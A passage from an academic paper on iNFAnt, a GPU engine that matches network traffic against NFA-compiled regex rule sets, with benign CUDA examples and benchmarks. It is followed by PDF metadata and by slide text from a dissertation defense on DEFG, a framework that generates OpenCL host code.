cycles. Latency hiding is one of the reasons for the large number of threads supported by CUDA devices; the hardware scheduler automatically suspends threads that are waiting for the completion of global memory transactions and switches to others that are ready to run. In order to use all the available bandwidth efficiently, it is necessary to perform as few accesses as possible, as wide as the memory bus allows. Since each thread typically accesses small amounts of memory at a time, a hardware controller tries to automatically coalesce many smaller memory accesses into fewer, larger transactions at run-time. This is possible only if all the accesses involved respect a well-defined pattern: on newer CUDA devices all the addresses must fall within the same naturally-aligned 256-byte memory area.
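As a generic illustration of this coalescing rule (not iNFAnt code; the kernel names and parameters are invented), compare a copy kernel whose consecutive threads read consecutive words with one whose reads are scattered:

```
// Illustrative CUDA kernels (not from the paper). In the first, thread i of a
// warp reads word i of a contiguous array, so the hardware can merge the loads
// of a warp into a few wide transactions. In the second, neighbouring threads
// read words that are `stride` elements apart, so the addresses fall into many
// distinct memory segments and cannot be coalesced.
__global__ void copy_coalesced(const int *in, int *out, int n) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;  // consecutive threads, consecutive addresses
    if (i < n)
        out[i] = in[i];
}

__global__ void copy_strided(const int *in, int *out, int n, int stride) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < n)
        out[i] = in[(i * stride) % n];              // scattered addresses defeat coalescing
}
```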
CUDA devices provide two further special interfaces to global memory areas in the form of constant and texture memory, which provide the additional benefit of hardware caching. Given their limitations in size (e.g. 64 KB at most for constant memory) and supported access patterns, they are currently unused by iNFAnt. 3.3 Concurrency and data-sharing model CUDA devices are intended to be used in scenarios where each thread requires minimal interaction with its siblings: only a subset of the common synchronization and communication primitives is therefore provided. ^2 Described at http://www.khronos.org/opencl/. ^3 Available at http://www.nvidia.com/object/cuda_home_new.html. For any application, the set of active threads is divided into blocks: threads from the same block are always scheduled on a specific multiprocessor and communicate through its shared memory; ad-hoc primitives enable atomic read-modify-write cycles. This is the only form of inter-thread communication currently supported by the CUDA model: there are no reliable semantics for concurrent accesses to global memory and threads belonging to different blocks cannot exchange data. Synchronization works in a similar fashion: CUDA provides primitives for pausing a thread until all the others in the same block have reached the same point in their execution flow. Once again, threads belonging to different blocks cannot interact. 4. INFANT DESIGN It appears clear from Section 3 that traditional algorithms developed for general-purpose processors are bad matches for the CUDA architecture, often using a small number of threads and paying little attention to memory access patterns. This is even more true for classic automata traversal algorithms: input symbols must be processed sequentially and their randomness can lead to unpredictable branching patterns. It appears likely that a good traversal algorithm should be a departure from the traditionally accepted practice. Given the CUDA architecture and the problem at hand, we have identified the following design guidelines: 1. Memory bandwidth is abundant. Reducing the number of per-thread global memory accesses is not a priority if they are fully coalesced and there are enough threads to effectively hide memory latency. Shared memory can be considered fast enough for our purpose without requiring any special considerations. 2. Memory space is scarce. This is especially true for the shared memory and for registers, but global memory should be used carefully as well: although comparatively big, it is common for automata to grow beyond the available amount, even when starting from small regex sets; the ability to store very large automata is also an advantage with multistriding (described in Section 4.3). 3. Threads are cheap. In contrast to CPUs, CUDA devices are designed to work best when presented with very large numbers of threads, up to 512 per block, and the maximum number of blocks as supported by the actual GPU considered. 4. Thread divergence is expensive. The large number of threads is manageable by the hardware only if all of them execute the same instruction at the same time or if, at worst, the number of possible alternative paths is very small [5]. The program should be structured so that jumps are few and replaceable with predicated execution whenever feasible (see the sketch below).
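The following generic fragment illustrates guideline 4; it is not taken from iNFAnt, and the kernels and the clamping operation are invented for illustration. The first version contains a data-dependent branch; the second expresses the same result as a select, which the compiler can map to predicated instructions instead of a jump.

```
// Illustrative only: a branchy kernel and an equivalent, divergence-friendly form.
__global__ void clamp_branchy(float *data, int n, float limit) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < n) {
        if (data[i] > limit)               // data-dependent branch: threads of a warp may diverge
            data[i] = limit;
    }
}

__global__ void clamp_select(float *data, int n, float limit) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < n) {
        float v = data[i];
        data[i] = (v > limit) ? limit : v; // a select (or fminf(v, limit)): no control-flow split
    }
}
```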
4.1 NFA representation In order to adhere to our guidelines and in contrast to classic approaches, iNFAnt adopts an internal format for the FSA transition graph that we dubbed symbol-first representation: the system keeps a list of (source, destination) tuples, representing transitions, sorted by their triggering symbol. This list can grow very large, so it must be stored in a global memory array, together with an ancillary data structure that records the first transition for each symbol, to allow easy random look-ups. As an example, the representation for the automaton in fig. 1(a) is reported in fig. 1(b). [Figure 1: Symbol-first representation.] The current implementation allocates 16 bits per state label, thus supporting up to 65535 states, which is more than enough for our current workloads that peak at around 6000-9000 states. It should be noted that this limitation does not affect the maximum number of transitions, which depends only on global memory availability. In order to reduce the number of transitions to be stored, and also to speed up execution, iNFAnt adopts a special representation for self-looping states, i.e. those with an outgoing transition to themselves for each symbol of the alphabet. These states are marked as persistent in a dedicated bit-vector and, once reached during a traversal and marked as active, they will never be reset. Bit-vectors containing current and future active state sets are stored in shared memory. 4.2 Traversal algorithm The traversal algorithm follows naturally from the data structure definition. Many packets are batched together and mapped 1:1 to CUDA blocks to be processed in parallel; every thread in each block executes the instructions reported as pseudo-code in fig. 2. State bit-vectors appear with an sv subscript and underlined statements are performed in cooperation by all the threads in a block. More precisely, the copies in lines 1, 5, 13 are performed by assigning each thread a different portion of the bit-vectors involved. Underlined statements also correspond to synchronization points in the program: after execution, each thread will wait for the others to reach the same point before proceeding. Parallelism is exploited not only because at any given time multiple blocks are active to process multiple packets, but also because for each packet each thread examines a different transition among those pending for the current symbol when running the inner while loop (lines 6-12). A large number of transitions can be processed in parallel this way, and if there are enough threads then the time spent in processing a single symbol will be effectively equal to what would be required for a deterministic automaton. With regard to access patterns, the traversal algorithm requires global memory for reading the current input symbol and for accessing the transition table: both these accesses can be coalesced. All the threads working on the same packet access the same symbol (and offset) at the same time because of synchronization: the card can execute a single transaction. Accesses to the transition graph can be coalesced as well: since each thread examines a different entry in the transition list for the current symbol, threads with consecutive indexes read consecutive memory locations. 4.3 Multistriding Multistriding transforms an automaton so that it consumes multiple input symbols per transition: intuitively, the alphabet of a 2-strided automaton consists of all the possible pairs of original input symbols and each transition is the composition of 2 adjacent transitions of the original. The transformation required for 2-striding an FSA, documented in [2], can be performed ahead of time and off-line.
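A simplified reconstruction of one traversal step is sketched below, based on the description above and on the pseudo-code of fig. 2. It is not the actual iNFAnt source: the names and signatures are invented, the persistent-state optimization is omitted, and one packet per CUDA block is assumed. The same loop applies unchanged to a multistrided automaton, since only the alphabet and the transition table change.

```
// Hypothetical sketch of the symbol-first traversal (not the iNFAnt source).
// tx_src/tx_dst hold the (source, destination) pairs sorted by triggering
// symbol; first_tx[s] is the index of the first pair for symbol s, so the
// pairs for s end where those for s+1 begin (first_tx has alphabet+1 entries).
// Launch with one block per packet and 2*words*sizeof(unsigned) bytes of
// dynamic shared memory for the current and future state bit-vectors.
__global__ void nfa_step(const unsigned short *tx_src,
                         const unsigned short *tx_dst,
                         const int *first_tx,
                         const unsigned char *symbols, int len,
                         unsigned *state_bits, int words)
{
    extern __shared__ unsigned sh[];
    unsigned *cur = sh, *fut = sh + words;
    for (int w = threadIdx.x; w < words; w += blockDim.x) {
        cur[w] = state_bits[w];                      // load the initial active set
        fut[w] = 0;
    }
    __syncthreads();

    for (int pos = 0; pos < len; ++pos) {            // symbols must be consumed in order
        int s = symbols[pos];
        // Each thread examines a different pending transition for this symbol.
        for (int t = first_tx[s] + threadIdx.x; t < first_tx[s + 1]; t += blockDim.x) {
            unsigned src = tx_src[t];
            if (cur[src >> 5] & (1u << (src & 31))) {            // source state active?
                unsigned dst = tx_dst[t];
                atomicOr(&fut[dst >> 5], 1u << (dst & 31));      // activate destination
            }
        }
        __syncthreads();
        for (int w = threadIdx.x; w < words; w += blockDim.x) {  // future becomes current
            cur[w] = fut[w];
            fut[w] = 0;
        }
        __syncthreads();
    }
    for (int w = threadIdx.x; w < words; w += blockDim.x)
        state_bits[w] = cur[w];                      // write the final active set back
}
```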
After multistriding it is possible for the traversal algorithm to consider pairs of symbols at once, thus reducing global execution time. Squaring has multiple effects, most prominently producing an increase in both transition count and alphabet size. The former is not a major problem if the source automaton is small, but can (and does, in our tests) quickly lead to memory exhaustion if this is not the case, e.g. when creating DFAs from large rule sets, thus limiting the applicability of the procedure when not working with NFAs. The increase in alphabet size, on the contrary, is particularly troublesome if the procedure is repeated multiple times, as the length of each symbol and the cardinality of the alphabet can quickly approach intractability. In order to avoid this issue, iNFAnt performs an alphabet compression step that removes any symbol that does not appear on transition labels and renames all the remaining ones based on equivalence classes. Compression also makes the symbol set dense, allowing simpler data structures to be used for look-ups. Each multistriding step emits a translation table that (in general) maps pairs of input symbols into a single output symbol: this is possible without an explosion in symbol count because in most cases only a small portion of the possible symbol space is used. In order for a packet to be processed after multistriding, it must first undergo the same translation, a procedure currently performed on the host CPU using a hashed look-up table. The CPU executes this algorithm in a pipeline with the GPU-based automaton traversal, reducing its run-time impact; the number of symbols to be processed is halved by each rewrite and, by extension, the time required to process each data unit on the GPU is reduced, with no modifications to the traversal algorithm. 4.4 System interface A major architectural choice is how to interface the iNFAnt engine with other external components, both for the creation of the required data structures and to pass packets to and from the GPU at run-time. The current iNFAnt prototype exposes a simple API that allows loading precomputed NFAs onto the graphics card and submitting a batch of packets for processing. Packet copies can be performed through DMA and results are read back in a similar fashion. While GPU operations such as transfer initiation or kernel launch are not free, they execute quickly and, in most cases, have been found to be of little relevance when compared to the actual time spent in pattern matching. 5. EXPERIMENTAL EVALUATION iNFAnt has been evaluated by comparing its throughput and memory consumption with those achieved by HFAs, which represent the current state of the art for many purposes by closely following the behavior (and speed) of DFAs on non-troublesome rule sets, while implementing strategies to prevent state space explosions. The test plan involved 3 regex sets designed to highlight different aspects of the applications under scrutiny. The http-sig rule set is composed of 2 regular expressions that recognize specific HTTP headers; the resulting automaton is simple and almost completely linear, posing little challenge to both iNFAnt and HFAs and providing baseline results to compare per-byte costs. The Snort534 set (taken from [3]) consists of 534 regular expressions; it can be divided into subsets that share an initial portion while the tails differ, a structure that makes it a good target for HFAs.
Finally, all the protocol signatures from the L7 traffic classifier^4 make up the L7-filter set, which is a very complex and irregular test set where no common prefixes or other properties can be exploited. In spite of its limited size (around 120 regexes), the L7-filter is the largest of our test cases in terms of memory occupation, regardless of the form in which it is compiled. All the tests were performed using a single core of the otherwise-unloaded test machine, a 4-core Xeon machine running at 3 GHz and provided with 4 GiB of RAM; GPU tests were conducted on the same platform equipped with an nVidia GeForce 260 GTX graphics card with 1 GiB of RAM and 27 multiprocessors clocked at 1.24 GHz. All relevant caches (e.g. processor, disk) were warmed by performing unmeasured test runs. As input, a 1 GiB trace of real-world network traffic was used. The two platforms (GPU card and CPU host system) are significantly different in terms of architecture and specification, thus making their performance not directly comparable. However, they both represent significant examples of commercially available middle-tier hardware. Hence, the throughput measurements reported in the following sections should be regarded as order-of-magnitude estimates of the performance obtainable using commodity hardware devices. 5.1 Pattern-matching throughput Figure 3 reports the best throughputs obtained for all techniques. In order not to inflate the results, all measurements were performed by taking into account only payload bytes and excluding packet headers (which were not examined). The 'NFA++' data series reports results obtained by enabling the self-looping states optimization described in sec. 4.1. iNFAnt allows the user to set the number of threads per packet and the number of packets submitted to the card in a batch for parallel processing: the best results obtained by exploring the possible configuration space are reported here. As can be seen, the throughput achieved by non-strided NFAs is comparable to, though lower than, the corresponding HFA results. This can be justified by the higher per-byte traversal cost of NFAs and by the higher instruction execution time of GPUs: even if parallelism reduces the amount of time required to process a single packet, this is not enough to completely compensate for the aforementioned aspects. However, the situation is vastly improved by the introduction of multistriding and the self-loop state optimization, leading to far better throughputs than HFAs. Given the complexity of the CUDA architecture, it is interesting to try to identify the iNFAnt performance bottleneck. Global memory bandwidth, commonly found to be a scalability limitation, is not an issue here: its measured usage is, in most cases, around 20-40 Gb/s, less than the card peak performance (around 80 Gb/s). Shared memory issues can also be ruled out: while it is true that a reduction of its usage would speed execution up (more blocks could be scheduled per multiprocessor), the simulated difference was found to be minimal. Bank conflicts arising from write contention when updating the future state vector are also rare: disabling shared memory updates altogether brings little improvement in run-time performance (1-3% in most cases). Similar considerations also hold for register usage. Profiling information^5 shows that the vast majority of running time is spent in processing instructions, even if iNFAnt performs very little computation.
It is therefore likely that in most cases the bottleneck lies in the relatively large number of instructions to be executed per packet, coupled with the high instruction execution time of GPUs. As with most current traversal algorithms, input symbols must be processed in order, leading to large numbers of iterations in the outer loop of fig. 2. This also explains why multistriding can improve throughput significantly. 5.2 Global memory consumption Figure 4 shows the amount of global memory required for automaton storage, which is by far the largest data structure used by both the techniques considered; shared memory occupation in iNFAnt is considerably below the maximum amount in all test cases (about 6000 states are required for L7-filter). ^4 Available at http://l7-filter.sf.net/. ^5 Not reported here due to space constraints. It appears clear that in general the NFAs used by iNFAnt use memory comparable to, or less than, the corresponding HFAs; it is interesting to note that the L7-filter rule set is impossible to compile in HFA form on our test machine, regardless of the provisions built into the HFA model; its column in the chart corresponds to the lower bound of estimated consumption (4 GiB). A direct comparison with DFAs yields even better results for NFAs: besides L7-filter, Snort534 incurs state space explosion as well. The difference between NFAs and other approaches is exacerbated when considering multistriding: given the increment in size, only the adoption of NFAs makes this technique feasible. The NFA memory consumption reported must also be considered as a worst-case measurement: the NFAs considered were not in a minimal, canonical form and it might be possible to further reduce their sizes by appropriately modifying the generation process. 5.3 Multistriding and self-loop handling Both throughput and memory occupation are affected by iNFAnt optimizations. As expected, in most cases multistriding improves run-time performance, mainly because of shortened input packets (in terms of symbols), requiring fewer iterations in the traversal algorithm; the improvements observed are roughly linear with the number of automaton squarings performed, a result consistent with our bottleneck analysis. At the same time, multistriding yields larger automata, mainly because of increased transition counts; this effect is clearly visible in fig. 4. Nevertheless, iNFAnt is effective in dealing with this issue. On one hand, as can be seen from the charts, the available amount of global memory is adequate in all cases; on the other hand, the increase in transition counts is somewhat offset by larger alphabets, making the number of transitions to be examined per symbol grow relatively slowly. As for the rewriting operation itself, in most practical cases it requires less time than automata traversal, so its cost can be completely absorbed by pipelining. Self-looping state optimization, on the contrary, directly reduces transition counts. While obviously not designed to completely counteract the effects of multistriding, the introduction of separate handling for self-looping states proves to be very effective both at reducing the number of transitions stored in global memory (especially with deeper multistriding) and at speeding up execution, once again thanks to lower per-symbol transition counts. 6. CONCLUSIONS AND FUTURE WORK This paper presented the design and evaluation of iNFAnt, a novel NFA-based pattern matching engine.
iNFAnt is explicitly designed to run on graphical processing units, exploiting the large number of execution cores and the high-bandwidth memory interconnections through its ad-hoc data structure and traversal algorithm; more in detail, the automaton representation and traversal algorithm adopted by iNFAnt match well the CUDA architecture, allowing full coalescing of memory accesses and requiring very little thread divergence. The adoption of the NFA model allows a significant reduction in memory occupation from the get-go, avoiding state space issues by design and enabling iNFAnt to handle complex rule sets; the optimized handling of self-looping states further reduces memory consumption while at the same time improving run-time performance. Additional free memory, if available, can be traded off for processing speed with the adoption of multistriding, thus effectively counteracting the higher per-byte cost deriving from the non-deterministic model and the high instruction execution time taken by GPUs. Multistriding is especially feasible on the iNFAnt platform because of the lower baseline memory requirements and because the traversal performance depends on the number of transitions per input symbol; other FSA engines, especially if relying on a small alphabet, might be adversely affected by its introduction. While iNFAnt might not be the first GPU-based pattern matching engine, to the best of our knowledge, it is one of the first to use NFAs to implement a technique specifically designed for graphical processors. In contrast to most approaches ported from general-purpose CPUs, the bottleneck is not memory bandwidth but the execution cores processing speed; higher throughputs could be achieved on the same architecture with more and/or faster execution units. With regard to future developments, we are planning to perform string rewriting directly on the GPU, thus completely offloading the host CPU: while the task itself is embarrassingly parallel, an efficient implementation of look-up tables on CUDA devices is not. A more thorough evaluation of run-time behavior is also in progress, comparing iNFAnt with more alternative techniques and performing additional scalability tests on more powerful hardware devices. 7. REFERENCES
{"Source-Url": "https://iris.polito.it/retrieve/handle/11583/2373004/53283/10CCR-Infant.pdf", "len_cl100k_base": 5918, "olmocr-version": "0.1.50", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 20469, "total-output-tokens": 6814, "length": "2e12", "weborganizer": {"__label__adult": 0.0005698204040527344, "__label__art_design": 0.0006899833679199219, "__label__crime_law": 0.0008144378662109375, "__label__education_jobs": 0.000415802001953125, "__label__entertainment": 0.00016307830810546875, "__label__fashion_beauty": 0.00026726722717285156, "__label__finance_business": 0.0002340078353881836, "__label__food_dining": 0.00042510032653808594, "__label__games": 0.0008873939514160156, "__label__hardware": 0.01227569580078125, "__label__health": 0.0007739067077636719, "__label__history": 0.0005025863647460938, "__label__home_hobbies": 0.00015544891357421875, "__label__industrial": 0.00128936767578125, "__label__literature": 0.0003001689910888672, "__label__politics": 0.00043272972106933594, "__label__religion": 0.0009241104125976562, "__label__science_tech": 0.3857421875, "__label__social_life": 0.00010073184967041016, "__label__software": 0.019317626953125, "__label__software_dev": 0.572265625, "__label__sports_fitness": 0.0003993511199951172, "__label__transportation": 0.001026153564453125, "__label__travel": 0.00027489662170410156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31638, 0.02027]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31638, 0.4729]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31638, 0.92167]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 4479, false], [4479, 11071, null], [11071, 16725, null], [16725, 20377, null], [20377, 25138, null], [25138, 31638, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 4479, true], [4479, 11071, null], [11071, 16725, null], [16725, 20377, null], [20377, 25138, null], [25138, 31638, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31638, null]], "pdf_page_numbers": [[0, 0, 1], [0, 4479, 2], [4479, 11071, 3], [11071, 16725, 4], [16725, 20377, 5], [20377, 25138, 6], [25138, 31638, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31638, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
a0d5844222368dcdb5fa14727c0c6396ebcb5821
GPU DECLARATIVE FRAMEWORK: DEFG Dissertation Defense Robert Senser October 29, 2014 PhD Committee: Gita Alaghband (chair) Tom Altman (advisor) Michael Mannino Boris Stilman Tam Vu Presentation Outline • Motivation for *GPU Declarative Framework*: DEFG • Background: Graphics Processing Units (GPUs) and OpenCL • DEFG Framework – Description – Performance • Diverse Applications using DEFG – Image Filters (Sobel and Median) – Breadth-First Search – Sorting Roughly Sorted Data – Iterative Matrix Inversion • Dissertation Accomplishments • Future Research DEFG Motivation • GPUs can provide high throughput – Radeon HD 7990: 2 TFLOPS (double-precision) • Developing parallel HPC software is difficult • Parallel development for GPUs is even more difficult • GPU HPC software development requires: – Understanding of unique GPU hardware characteristics – Use of specialized algorithms – Use of GPU-specific, low-level APIs • Driving notion behind DEFG: *Let software minimize the complexity and difficulty* Background: GPUs and OpenCL • Graphics Processing Unit (GPU) – Highly specialized coprocessor – Hundreds of cores, with thousands of threads – SIMT: *Single Instruction, Multiple Thread* • Similar to Single Instruction, Multiple Data (SIMD) model • Threads not on the execution path are paused • Common GPU programming environments – OpenCL: an open, royalty-free standard – CUDA: NVIDIA proprietary • DEFG is designed for OpenCL High-Level GPU Architecture GPU Characteristics: • Processors commonly connected by Peripheral Component Interconnect Express (PCIe) bus • GPU has own fast Global RAM • Threads have a small amount of fast local memory • May have a hardware cache • Many hardware-managed threads • Lacks CPU-style predictive branching, etc. OpenCL Overview • Specification maintained by Khronos Group • Open, multiple-vendor standard • Support over a wide range of devices – GPUs – CPUs – Digital signal processors (DSPs) – Field-programmable gate arrays (FPGAs) • Device kernels written in C • Executing threads share the same kernel • CPU-side code – C/C++ – Very detailed CPU-side application programming interface (API) – Third-party bindings for Java, Python, etc. GPU Applications • Three components – Application algorithms – GPU kernel code • Can have multiple kernels per application • Each kernel usually contains an algorithm or algorithm step • Kernel code often uses GPU-specific techniques – CPU-side code • Moves OpenCL kernel to GPU • Manages GPU execution and errors • Moves application data between CPU and GPU • May contain a portion of application’s algorithms • **DEFG’s domain is the CPU-side** GPU Performance • Major GPU Performance Concerns – Kernel Instruction Path Divergence • Due to conditional statements (ifs, loops, etc.) 
• Threads may pause • Minimize, if not totally avoid – High Memory Latency • One RAM access time equals time of 200-500 instructions • Accesses to global RAM should be coalesced • Farber’s GPU suggestions [Farber2011]: – “Get the data on the GPU and leave it” – “Give the GPU enough work to do” – “Focus on data reuse to avoid memory limits” DEFG Overview • GPU software development tool for OpenCL • Contains a Domain Specific Language (DSL) – Specialized computer language, focused on a domain – Developer writes CPU code with DEFG’s DSL • Relative to hand-written code – *Faster development* by using declarative approach – *Simpler* by using design patterns and abstractions • DEFG generates the corresponding CPU program • Developer provides standard OpenCL GPU kernels The DEFG generates C/C++ code for the CPU DEFG Translator - DEFG Source Input - ANTLR-based Parser - XML-based Tree - Optimizer (Java) - Code Generator (C++) - Template Driven - C/C++ Output [Image of DEFG Translator Architecture] [Refs: Senser2014] DEFG Code Sample 01. declare application sobel 02. declare integer Xdim (0) 03. declare integer Ydim (0) 04. declare integer BUF_SIZE (0) 05. declaregpu gpusone (any) 06. declare kernel sobel_filter SobelFilter_Kernels ( [[ 2D,Xdim,Ydim ]] ) 07. declare integer buffer image1 ( BUF_SIZE ) 08. integer buffer image2 ( BUF_SIZE ) 09. call init_input (image1(in) Xdim (out) Ydim (out) BUF_SIZE(out)) 10. execute run1 sobel_filter ( image1(in) image2(out) ) 11. call disp_output (image2(in) Xdim (in) Ydim (in) ) 12. end (Generates 440 lines of C/C++) ... status = clSetKernelArg(sobel_filter, 1, sizeof(cl_mem), (void *)&buffer_image2); if (status != CL_SUCCESS) { handle error } // *** execution size_t global_work_size[2]; global_work_size[0] = Xdim ; global_work_size[1] = Ydim ; status = clEnqueueNDRangeKernel(commandQueue, sobel_filter, 2, NULL, global_work_size, NULL, 0, NULL, NULL); if (status != CL_SUCCESS) { handle error } // *** result buffers status = clEnqueueReadBuffer(commandQueue, buffer_image2, CL_TRUE, 0, BUF_SIZE * sizeof(int), image2, 0, NULL, NULL); ... DEFG Benefits and Features - Implements OpenCL applications with less effort - Requires writing many fewer lines of code - Encourages the developer to focus on the kernels - How is this done? 
- With the Domain-Specific Language - Data characteristics are declared - Pre-defined DEFG design patterns are specified - Many implementation details are managed inside DEFG - Technical Features - Abstracts the OpenCL APIs, and their many details - Automatic optimization of buffer transfers - Supports multiple GPU devices - Handles error detection DEFG Design Patterns • Invocation Patterns (*Control Flow*) – Sequential-Flow – Single-Kernel Repeat Sequence – Multiple-Kernel • Concurrent-GPU Patterns (*Multiple-GPU Support*) – Multiple-Execution – Divide-Process-Merge – Overlapped-Split-Process-Concatenate • Other patterns include: – Prefix-Allocation (buffer allocation) – Code-Morsel (code insertion) – Anytime algorithm (control flow change on event) – BLAS-Usage (interface to Basic Linear Algebra Subprograms) • Design patterns can be combined – Example: Sequential-Flow + Multiple-Execution + Divide-Process-Merge Diverse DEFG Applications • Demonstrate DEFG’s applicability • Four diverse GPU application areas – *Image Filters* • Sobel Operator • Median Filter • Showcase for multiple GPU support – *Graph Theoretic* • Breadth-First Search with large graphs • Prefix-sum based buffer management – *Sorting* • Sorting partially sorted data • Prefix scan – *Numerical* • Iterative Matrix Inversion • clMath BLAS (Basic Linear Algebra Subprograms) • Anytime algorithm Filter Application: Sobel Image Filter • Sobel operator detected edges in images • Pixel gradient was calculated from 3x3 mask • A single GPU kernel was invoked once • Example of DEFG Sobel operator processing: Common uses: Object recognition, autonomous vehicle navigation, etc. Filter Application: Median Filter - Median determined for 5x5 mask - Value at center of mask replaced by median value - Like Sobel: a single GPU kernel, invoked once - Example of DEFG median 5x5 filter processing: Common uses: Electronic signal smoothing, noise removal, image preprocessing, etc. **Application: Breadth-First Search (BFS)** - Well-studied graph-theoretic problem - Focus: BFS with Large Very Irregular (LVI) Graphs - Social Networks, Network Routing, A.I., etc. - Numerous published GPU BFS approaches, starting with Harish [Harish2007] - Harish used “Dijkstra” BFS - Level-synchronous - A GPU thread assigned to each vertex - Vertex frontier stored as a Boolean array List-Based BFS Vertex Frontier • Merrill approach to vertex buffer management [Merrill2010] – Issue: list with multiple update threads – Solution: prefix sum to allocate buffer elements • Shared buffers with multiple GPU devices Goal: Improve on $O(n \log n)$ sorting bound when sequence is partially sorted Based on the prior sorting work by T. Altman, et al. [Altman1989] $k$ is a measure of “sortedness” A sequence is $k$-sorted if no element is more than $k$ positions out of sequence This $k$-sorted trait can be exploited Knowing $k$ allows for sorts of $O(n \log k)$ If $k$ is small, obtain a substantial performance gain Parallel Roughly Sorting Algorithm Notion: Convert the large sort operation into many smaller, parallel sort operations. Algorithm steps: - LR: Left-to-right prefix scan (maximum) - RL: Right-to-left prefix scan (minimum) - DM: Computed distance measure using LR and RL - UB: Computed upper bound of distance measure - This value became the $k$ value - Value used to determine size of sort blocks - Sort: Individual blocks sorted in parallel Iterative Matrix Inversion (IMI) • Matrix inversion using M. 
Altman’s method [Altman1960] • Required GPU matrix operations – Used OpenCL clMath BLAS library – Required clMath integration into DEFG • With *anytime* approach – Inversion can produce early results – Balance run time against accuracy – Anytime management in DEFG M. Altman IMI Approach The initial inverse approximation, that is $R_0$, can be formed by: $$R_0 = \alpha I$$ where $\alpha = 1 / \| A \|$ $\| A \|$ is the Euclidean norm of $A$ and $I$ is the identity matrix. To invert matrix $A$, each iteration calculates: $$R_{n+1} = R_n(3I - 3AR_n + (AR_n)^2).$$ - Better $R_0$ estimate provides for quicker convergence - Application will end iterations when - Inversion quality measure is met - Maximum iterations have occurred - Anytime algorithm run-time limit is crossed Example performance: $7,000 \times 7,000$ matrix inversion in 9 iterations Accomplishments DEFG Framework • Fully Implemented – Consists of approximately 5,000 lines of code – 7 different applications – Complete User’s Guide – Packaged for general use • Design Patterns – 12+ Patterns – Patterns designed to be combined • Description of DEFG Limits DEFG Usability and Performance • Published DEFG Papers – Conference: Parallel and Distributed Processing Techniques and Applications (PDPTA’13) [Senser2013] – Conference: Parallel and Distributed Processing Techniques and Applications (PDPTA’14) [Senser2014] • Existing OpenCL applications converted to DEFG 1. Breadth-First Search (BFS) 2. Floyd-Warshall (FW, All-Pairs Shortest Path) 3. Sobel Image Filter (SOBEL) • CPU-side re-coded in DEFG, used existing GPU kernels • Comparisons between DEFG and existing applications – Lines-of-Code – Run-time Performance On average, the DEFG code is 1/20th of the reference code size • Shown are average run times • CPU-based BFS-4096 was likely faster due to CPU’s cache **Summary:** *DEFG provided equal, or better, performance* Performance of Diverse Applications • Implementations – Filtering – BFS – Sorting – Iterative Inversion • Implementation Goals – Show general applicability of DEFG – Multiple-GPU: Filtering, BFS, and Sorting – Interesting Algorithms: Sorting and Iterative Inversion – BLAS Proof of Concept: Iterative Inversion • Performance results – Problem-size characteristics – Run-time metrics – Observations for both single-GPU and multiple-GPU modes – Platform: C.S.E. 
Accomplishments

DEFG Framework

• Fully implemented
  – Consists of approximately 5,000 lines of code
  – 7 different applications
  – Complete User’s Guide
  – Packaged for general use
• Design Patterns
  – 12+ patterns
  – Patterns designed to be combined
• Description of DEFG limits

DEFG Usability and Performance

• Published DEFG papers
  – Conference: Parallel and Distributed Processing Techniques and Applications (PDPTA’13) [Senser2013]
  – Conference: Parallel and Distributed Processing Techniques and Applications (PDPTA’14) [Senser2014]
• Existing OpenCL applications converted to DEFG:
  1. Breadth-First Search (BFS)
  2. Floyd-Warshall (FW, All-Pairs Shortest Path)
  3. Sobel Image Filter (SOBEL)
  – The CPU side was re-coded in DEFG, reusing the existing GPU kernels
• Comparisons between DEFG and the existing applications
  – Lines of code: on average, the DEFG code is 1/20th of the reference code size
  – Run-time performance: average run times are shown; the CPU-based BFS-4096 was likely faster due to the CPU’s cache

**Summary:** *DEFG provided equal, or better, performance*

Performance of Diverse Applications

• Implementations
  – Filtering
  – BFS
  – Sorting
  – Iterative Inversion
• Implementation goals
  – Show the general applicability of DEFG
  – Multiple-GPU: Filtering, BFS, and Sorting
  – Interesting algorithms: Sorting and Iterative Inversion
  – BLAS proof of concept: Iterative Inversion
• Performance results
  – Problem-size characteristics
  – Run-time metrics
  – Observations for both single-GPU and multiple-GPU modes
  – Platform: the C.S.E. Department’s Hydra server

Image Filtering

• Filtering applications
  – Design patterns used in both SOBEL and MEDIAN:
    • *Sequential-Flow*
    • *Multiple-Execution*
    • *Overlapped-Split-Process-Concatenate*
• Image neighborhoods
  – SOBEL application: 3x3 grid
  – MEDIAN application: 5x5 grid
• The SOBEL application was refactored for multi-GPU use
  – Based upon the earlier DEFG SOBEL application
  – Utilized the existing OpenCL kernel

SOBEL Application

• Performance tests
  – 50% of the image, plus the overlapped area, is given to each GPU
  – Produced an image identical to the 1-GPU version
• Run-time performance with 2 GPUs
  – The run time was not as expected
    • OpenCL data-transfer times went up
    • Kernel execution times stayed the same
  – Issue: the computational workload is not sufficiently intense

